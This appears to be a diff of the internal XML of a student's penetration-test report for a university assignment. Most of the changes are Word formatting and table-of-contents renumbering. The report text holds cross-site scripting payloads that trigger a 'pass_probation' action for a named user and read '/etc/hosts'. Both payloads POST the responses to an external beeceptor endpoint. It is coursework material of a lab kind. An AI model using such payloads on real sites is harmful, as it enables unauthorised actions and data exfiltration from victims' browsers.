-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.onload</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = function () {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    var xhr2 = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.send("test=" +</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>this.responseText</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  };</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=xiandew");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
+              <w:t xml:space="preserve">  xhr.send();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -16378,21 +14549,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>the user “</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xiandew</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>”</w:t>
+              <w:t>the user “xiandew”</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -16800,7 +14957,6 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
@@ -16817,9 +14973,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>!--</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve">!-- </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16827,56 +14982,56 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
+              <w:t>xxs_2.html --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xxs_2.html --&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;script&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t xml:space="preserve">  var xhr = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16884,20 +15039,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">  xhr.onload = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16905,19 +15058,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">    var xhr2 = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16925,7 +15077,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>);</w:t>
+              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -16944,21 +15096,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">    xhr2.send("test=" + this.responseText);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhr.onload</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16966,7 +15115,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> = function () {</w:t>
+              <w:t xml:space="preserve">  };</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -16985,20 +15134,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    var xhr2 = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">  xhr.open("GET", "/etc/hosts");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -17006,178 +15153,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.send("test=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>this.responseText</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  };</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>("GET", "/etc/hosts");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
+              <w:t xml:space="preserve">  xhr.send();</w:t>
             </w:r>
           </w:p>
           <w:p>

--- a/Assignment 2 Pentest Report.docx
+++ b/Assignment 2 Pentest Report.docx
@@ -261,7 +261,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc71453302"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc71485033"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Executive Summary</w:t>
@@ -1046,7 +1046,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc71453302" w:history="1">
+          <w:hyperlink w:anchor="_Toc71485033" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1073,7 +1073,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71453302 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71485033 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1118,7 +1118,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71453303" w:history="1">
+          <w:hyperlink w:anchor="_Toc71485034" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1145,7 +1145,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71453303 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71485034 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1190,7 +1190,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71453304" w:history="1">
+          <w:hyperlink w:anchor="_Toc71485035" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1217,7 +1217,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71453304 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71485035 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1262,7 +1262,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71453305" w:history="1">
+          <w:hyperlink w:anchor="_Toc71485036" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1297,7 +1297,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71453305 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71485036 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1342,7 +1342,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71453306" w:history="1">
+          <w:hyperlink w:anchor="_Toc71485037" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1370,7 +1370,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71453306 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71485037 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1415,7 +1415,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71453307" w:history="1">
+          <w:hyperlink w:anchor="_Toc71485038" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1443,7 +1443,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71453307 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71485038 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1488,7 +1488,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71453308" w:history="1">
+          <w:hyperlink w:anchor="_Toc71485039" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1516,7 +1516,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71453308 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71485039 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1561,7 +1561,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71453309" w:history="1">
+          <w:hyperlink w:anchor="_Toc71485040" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1589,7 +1589,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71453309 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71485040 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1634,7 +1634,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71453310" w:history="1">
+          <w:hyperlink w:anchor="_Toc71485041" w:history="1">
             <w:r>
               <w:rPr>
